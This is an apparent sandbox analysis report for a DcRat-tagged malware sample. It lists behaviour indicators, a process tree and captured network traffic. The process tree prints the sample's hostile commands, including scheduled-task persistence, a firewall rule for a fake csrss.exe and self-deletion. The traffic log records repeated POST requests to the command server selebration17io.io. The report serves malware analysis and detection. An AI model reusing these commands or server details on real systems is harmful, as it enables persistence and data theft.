dcrat | d4bd84ab6a80420dd229e9607fb50c088667fdd38e2d8bf7a583269effa68278

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation	InstallSetup_four.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation	8B74.exe

Deletes itself 1 IoCs

pid	Process
3440	Process not Found

Executes dropped EXE 17 IoCs

pid	Process
1752	117F.exe
1576	8B74.exe
920	InstallSetup_four.exe
4780	288c47bbc1871b439df19ff4df68f076.exe
2396	april.exe
3460	april.tmp
2928	textultraedit.exe
4176	9B54.exe
1380	AE31.exe
4928	textultraedit.exe
1432	AE31.tmp
1452	BE8D.exe
1112	kimotoideplus.exe
3328	kimotoideplus.exe
1156	upk.0.exe
2412	upk.1.exe
2316	288c47bbc1871b439df19ff4df68f076.exe

Loads dropped DLL 4 IoCs

pid	Process
2028	regsvr32.exe
1752	117F.exe
3460	april.tmp
1432	AE31.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000700000002338e-261.dat	upx
behavioral2/files/0x000700000002338e-266.dat	upx
behavioral2/files/0x000700000002338e-267.dat	upx

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	BE8D.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1752 set thread context of 2080	1752	117F.exe	119

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
828	2080	WerFault.exe	119
2636	920	WerFault.exe	120
2012	1156	WerFault.exe	133

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	9B54.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d4bd84ab6a80420dd229e9607fb50c088667fdd38e2d8bf7a583269effa68278.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d4bd84ab6a80420dd229e9607fb50c088667fdd38e2d8bf7a583269effa68278.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d4bd84ab6a80420dd229e9607fb50c088667fdd38e2d8bf7a583269effa68278.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	9B54.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	9B54.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	upk.0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	upk.0.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
1724	schtasks.exe
4608	schtasks.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2180	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4112	d4bd84ab6a80420dd229e9607fb50c088667fdd38e2d8bf7a583269effa68278.exe
4112	d4bd84ab6a80420dd229e9607fb50c088667fdd38e2d8bf7a583269effa68278.exe
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found
3440	Process not Found

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4112	d4bd84ab6a80420dd229e9607fb50c088667fdd38e2d8bf7a583269effa68278.exe
4176	9B54.exe

Suspicious use of AdjustPrivilegeToken 27 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3440	Process not Found
Token: SeCreatePagefilePrivilege	3440	Process not Found
Token: SeShutdownPrivilege	3440	Process not Found
Token: SeCreatePagefilePrivilege	3440	Process not Found
Token: SeShutdownPrivilege	3440	Process not Found
Token: SeCreatePagefilePrivilege	3440	Process not Found
Token: SeShutdownPrivilege	3440	Process not Found
Token: SeCreatePagefilePrivilege	3440	Process not Found
Token: SeShutdownPrivilege	3440	Process not Found
Token: SeCreatePagefilePrivilege	3440	Process not Found
Token: SeShutdownPrivilege	3440	Process not Found
Token: SeCreatePagefilePrivilege	3440	Process not Found
Token: SeDebugPrivilege	2944	powershell.exe
Token: SeShutdownPrivilege	3440	Process not Found
Token: SeCreatePagefilePrivilege	3440	Process not Found
Token: SeShutdownPrivilege	3440	Process not Found
Token: SeCreatePagefilePrivilege	3440	Process not Found
Token: SeShutdownPrivilege	3440	Process not Found
Token: SeCreatePagefilePrivilege	3440	Process not Found
Token: SeShutdownPrivilege	3440	Process not Found
Token: SeCreatePagefilePrivilege	3440	Process not Found
Token: SeShutdownPrivilege	3440	Process not Found
Token: SeCreatePagefilePrivilege	3440	Process not Found
Token: SeShutdownPrivilege	3440	Process not Found
Token: SeCreatePagefilePrivilege	3440	Process not Found
Token: SeDebugPrivilege	4780	288c47bbc1871b439df19ff4df68f076.exe
Token: SeImpersonatePrivilege	4780	288c47bbc1871b439df19ff4df68f076.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2412	upk.1.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3440 wrote to memory of 1752	3440	Process not Found	113
PID 3440 wrote to memory of 1752	3440	Process not Found	113
PID 3440 wrote to memory of 1752	3440	Process not Found	113
PID 3440 wrote to memory of 1824	3440	Process not Found	114
PID 3440 wrote to memory of 1824	3440	Process not Found	114
PID 1824 wrote to memory of 2028	1824	regsvr32.exe	115
PID 1824 wrote to memory of 2028	1824	regsvr32.exe	115
PID 1824 wrote to memory of 2028	1824	regsvr32.exe	115
PID 3440 wrote to memory of 1576	3440	Process not Found	117
PID 3440 wrote to memory of 1576	3440	Process not Found	117
PID 3440 wrote to memory of 1576	3440	Process not Found	117
PID 1752 wrote to memory of 3204	1752	117F.exe	118
PID 1752 wrote to memory of 3204	1752	117F.exe	118
PID 1752 wrote to memory of 3204	1752	117F.exe	118
PID 1752 wrote to memory of 2080	1752	117F.exe	119
PID 1752 wrote to memory of 2080	1752	117F.exe	119
PID 1752 wrote to memory of 2080	1752	117F.exe	119
PID 1752 wrote to memory of 2080	1752	117F.exe	119
PID 1752 wrote to memory of 2080	1752	117F.exe	119
PID 1752 wrote to memory of 2080	1752	117F.exe	119
PID 1752 wrote to memory of 2080	1752	117F.exe	119
PID 1752 wrote to memory of 2080	1752	117F.exe	119
PID 1752 wrote to memory of 2080	1752	117F.exe	119
PID 1576 wrote to memory of 920	1576	8B74.exe	120
PID 1576 wrote to memory of 920	1576	8B74.exe	120
PID 1576 wrote to memory of 920	1576	8B74.exe	120
PID 1576 wrote to memory of 4780	1576	8B74.exe	121
PID 1576 wrote to memory of 4780	1576	8B74.exe	121
PID 1576 wrote to memory of 4780	1576	8B74.exe	121
PID 1576 wrote to memory of 2396	1576	8B74.exe	122
PID 1576 wrote to memory of 2396	1576	8B74.exe	122
PID 1576 wrote to memory of 2396	1576	8B74.exe	122
PID 2396 wrote to memory of 3460	2396	april.exe	123
PID 2396 wrote to memory of 3460	2396	april.exe	123
PID 2396 wrote to memory of 3460	2396	april.exe	123
PID 3440 wrote to memory of 4176	3440	Process not Found	125
PID 3440 wrote to memory of 4176	3440	Process not Found	125
PID 3440 wrote to memory of 4176	3440	Process not Found	125
PID 3460 wrote to memory of 2928	3460	april.tmp	126
PID 3460 wrote to memory of 2928	3460	april.tmp	126
PID 3460 wrote to memory of 2928	3460	april.tmp	126
PID 3440 wrote to memory of 1380	3440	Process not Found	127
PID 3440 wrote to memory of 1380	3440	Process not Found	127
PID 3440 wrote to memory of 1380	3440	Process not Found	127
PID 3460 wrote to memory of 4928	3460	april.tmp	129
PID 3460 wrote to memory of 4928	3460	april.tmp	129
PID 3460 wrote to memory of 4928	3460	april.tmp	129
PID 1380 wrote to memory of 1432	1380	AE31.exe	130
PID 1380 wrote to memory of 1432	1380	AE31.exe	130
PID 1380 wrote to memory of 1432	1380	AE31.exe	130
PID 3440 wrote to memory of 1452	3440	Process not Found	132
PID 3440 wrote to memory of 1452	3440	Process not Found	132
PID 3440 wrote to memory of 1452	3440	Process not Found	132
PID 920 wrote to memory of 1156	920	InstallSetup_four.exe	133
PID 920 wrote to memory of 1156	920	InstallSetup_four.exe	133
PID 920 wrote to memory of 1156	920	InstallSetup_four.exe	133
PID 1432 wrote to memory of 1112	1432	AE31.tmp	135
PID 1432 wrote to memory of 1112	1432	AE31.tmp	135
PID 1432 wrote to memory of 1112	1432	AE31.tmp	135
PID 1432 wrote to memory of 3328	1432	AE31.tmp	136
PID 1432 wrote to memory of 3328	1432	AE31.tmp	136
PID 1432 wrote to memory of 3328	1432	AE31.tmp	136
PID 4780 wrote to memory of 2944	4780	288c47bbc1871b439df19ff4df68f076.exe	137
PID 4780 wrote to memory of 2944	4780	288c47bbc1871b439df19ff4df68f076.exe	137

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\d4bd84ab6a80420dd229e9607fb50c088667fdd38e2d8bf7a583269effa68278.exe
"C:\Users\Admin\AppData\Local\Temp\d4bd84ab6a80420dd229e9607fb50c088667fdd38e2d8bf7a583269effa68278.exe"
1⤵
- DcRat
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4112

C:\Users\Admin\AppData\Local\Temp\117F.exe
C:\Users\Admin\AppData\Local\Temp\117F.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1752
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
  2⤵
  PID:3204
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
  2⤵
  PID:2080
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 1060
    3⤵
    - Program crash
    PID:828

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\60AA.dll
1⤵
- Suspicious use of WriteProcessMemory
PID:1824
- C:\Windows\SysWOW64\regsvr32.exe
  /s C:\Users\Admin\AppData\Local\Temp\60AA.dll
  2⤵
  - Loads dropped DLL
  PID:2028

C:\Users\Admin\AppData\Local\Temp\8B74.exe
C:\Users\Admin\AppData\Local\Temp\8B74.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1576
- C:\Users\Admin\AppData\Local\Temp\InstallSetup_four.exe
  "C:\Users\Admin\AppData\Local\Temp\InstallSetup_four.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:920
- - C:\Users\Admin\AppData\Local\Temp\upk.0.exe
    "C:\Users\Admin\AppData\Local\Temp\upk.0.exe"
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    PID:1156
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\EBKEHJJDAA.exe"
      4⤵
      PID:464
    - - C:\Users\Admin\AppData\Local\Temp\EBKEHJJDAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\EBKEHJJDAA.exe"
        5⤵
        
        PID:1932
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\EBKEHJJDAA.exe
        6⤵
        
        PID:2088
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 2.2.2.2 -n 1 -w 3000
        7⤵
        Runs ping.exe
        
        PID:2180
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 2464
      4⤵
      Program crash
      PID:2012
- - C:\Users\Admin\AppData\Local\Temp\upk.1.exe
    "C:\Users\Admin\AppData\Local\Temp\upk.1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:2412
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
      4⤵
      PID:3132
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:4996
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        5⤵
        DcRat
        Creates scheduled task(s)
        
        PID:1724
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 920 -s 708
    3⤵
    - Program crash
    PID:2636
- C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
  "C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4780
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2944
- - C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
    "C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
    3⤵
    - Executes dropped EXE
    PID:2316
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:1360
  - - C:\Windows\system32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      4⤵
      PID:2980
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:4792
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:2388
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:2440
  - - C:\Windows\rss\csrss.exe
      C:\Windows\rss\csrss.exe
      4⤵
      PID:3600
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4168
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        DcRat
        Creates scheduled task(s)
        
        PID:4608
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        5⤵
        
        PID:3468
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:3904
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:2124
- C:\Users\Admin\AppData\Local\Temp\april.exe
  "C:\Users\Admin\AppData\Local\Temp\april.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2396
- - C:\Users\Admin\AppData\Local\Temp\is-7LCLQ.tmp\april.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-7LCLQ.tmp\april.tmp" /SL5="$16020E,1478464,54272,C:\Users\Admin\AppData\Local\Temp\april.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3460
  - - C:\Users\Admin\AppData\Local\Text Ultra Edit\textultraedit.exe
      "C:\Users\Admin\AppData\Local\Text Ultra Edit\textultraedit.exe" -i
      4⤵
      Executes dropped EXE
      PID:2928
  - - C:\Users\Admin\AppData\Local\Text Ultra Edit\textultraedit.exe
      "C:\Users\Admin\AppData\Local\Text Ultra Edit\textultraedit.exe" -s
      4⤵
      Executes dropped EXE
      PID:4928

C:\Users\Admin\AppData\Local\Temp\9B54.exe
C:\Users\Admin\AppData\Local\Temp\9B54.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4176

C:\Users\Admin\AppData\Local\Temp\AE31.exe
C:\Users\Admin\AppData\Local\Temp\AE31.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1380
- C:\Users\Admin\AppData\Local\Temp\is-Q9DRO.tmp\AE31.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-Q9DRO.tmp\AE31.tmp" /SL5="$60206,2096861,54272,C:\Users\Admin\AppData\Local\Temp\AE31.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1432
- - C:\Users\Admin\AppData\Local\Kimoto IDE Plus\kimotoideplus.exe
    "C:\Users\Admin\AppData\Local\Kimoto IDE Plus\kimotoideplus.exe" -i
    3⤵
    - Executes dropped EXE
    PID:1112
- - C:\Users\Admin\AppData\Local\Kimoto IDE Plus\kimotoideplus.exe
    "C:\Users\Admin\AppData\Local\Kimoto IDE Plus\kimotoideplus.exe" -s
    3⤵
    - Executes dropped EXE
    PID:3328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2080 -ip 2080
1⤵
PID:4056

C:\Users\Admin\AppData\Local\Temp\BE8D.exe
C:\Users\Admin\AppData\Local\Temp\BE8D.exe
1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:1452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 920 -ip 920
1⤵
PID:1684

C:\Users\Admin\AppData\Local\Temp\5986.exe
C:\Users\Admin\AppData\Local\Temp\5986.exe
1⤵
PID:2404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1156 -ip 1156
1⤵
PID:3172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2404 -ip 2404
1⤵
PID:3672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2404 -ip 2404
1⤵
PID:3700

Network

DNS

72.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

72.32.126.40.in-addr.arpa

IN PTR

Response
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

217.106.137.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.106.137.52.in-addr.arpa

IN PTR

Response
DNS

241.154.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.154.82.20.in-addr.arpa

IN PTR

Response
DNS

241.154.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.154.82.20.in-addr.arpa

IN PTR
DNS

41.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.110.16.96.in-addr.arpa

IN PTR

Response

41.110.16.96.in-addr.arpa

IN PTR

a96-16-110-41deploystaticakamaitechnologiescom
DNS

103.169.127.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

103.169.127.40.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

13.86.106.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.86.106.20.in-addr.arpa

IN PTR

Response
DNS

13.86.106.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.86.106.20.in-addr.arpa

IN PTR
DNS

104.241.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.241.123.92.in-addr.arpa

IN PTR

Response

104.241.123.92.in-addr.arpa

IN PTR

a92-123-241-104deploystaticakamaitechnologiescom
DNS

selebration17io.io

Remote address:

8.8.8.8:53

Request

selebration17io.io

IN A

Response

selebration17io.io

IN A

91.215.85.120
POST

http://selebration17io.io/index.php

Remote address:

91.215.85.120:80

Request

POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hbaytijmojgigc.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 113
Host: selebration17io.io

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Sun, 17 Mar 2024 02:17:49 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://selebration17io.io/index.php

Remote address:

91.215.85.120:80

Request

POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vmkenjdakxwhtxo.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 300
Host: selebration17io.io

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Sun, 17 Mar 2024 02:17:49 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://selebration17io.io/index.php

Remote address:

91.215.85.120:80

Request

POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ynlgghpkiufbm.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 184
Host: selebration17io.io

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Sun, 17 Mar 2024 02:17:49 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://selebration17io.io/index.php

Remote address:

91.215.85.120:80

Request

POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://avcaprlevjjve.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 260
Host: selebration17io.io

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Sun, 17 Mar 2024 02:18:10 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://selebration17io.io/index.php

Remote address:

91.215.85.120:80

Request

POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://prjmplphnywbcrbb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 326
Host: selebration17io.io

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Sun, 17 Mar 2024 02:18:11 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://selebration17io.io/index.php

Remote address:

91.215.85.120:80

Request

POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kbcmvnjqijqdyf.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 351
Host: selebration17io.io

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Sun, 17 Mar 2024 02:18:32 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://selebration17io.io/index.php

Remote address:

91.215.85.120:80

Request

POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vxvxijritydgowd.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 277
Host: selebration17io.io

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Sun, 17 Mar 2024 02:18:32 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://selebration17io.io/index.php

Remote address:

91.215.85.120:80

Request

POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://mcjiwkcpvwu.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 304
Host: selebration17io.io

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Sun, 17 Mar 2024 02:18:42 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://selebration17io.io/index.php

Remote address:

91.215.85.120:80

Request

POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://oxedpyrjxkyc.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 313
Host: selebration17io.io

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Sun, 17 Mar 2024 02:18:42 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://selebration17io.io/index.php

Remote address:

91.215.85.120:80

Request

POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bctenhoyqauy.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 111
Host: selebration17io.io

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Sun, 17 Mar 2024 02:18:49 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://selebration17io.io/index.php

Remote address:

91.215.85.120:80

Request

POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wlcnhhapmstonbdt.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 250
Host: selebration17io.io

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Sun, 17 Mar 2024 02:18:49 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://selebration17io.io/index.php

Remote address:

91.215.85.120:80

Request

POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://phkmxsytbuot.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 356
Host: selebration17io.io

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Sun, 17 Mar 2024 02:18:50 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://selebration17io.io/index.php

Remote address:

91.215.85.120:80

Request

POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ckpqhueokwonx.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 206
Host: selebration17io.io

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Sun, 17 Mar 2024 02:18:51 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://selebration17io.io/index.php

Remote address:

91.215.85.120:80

Request

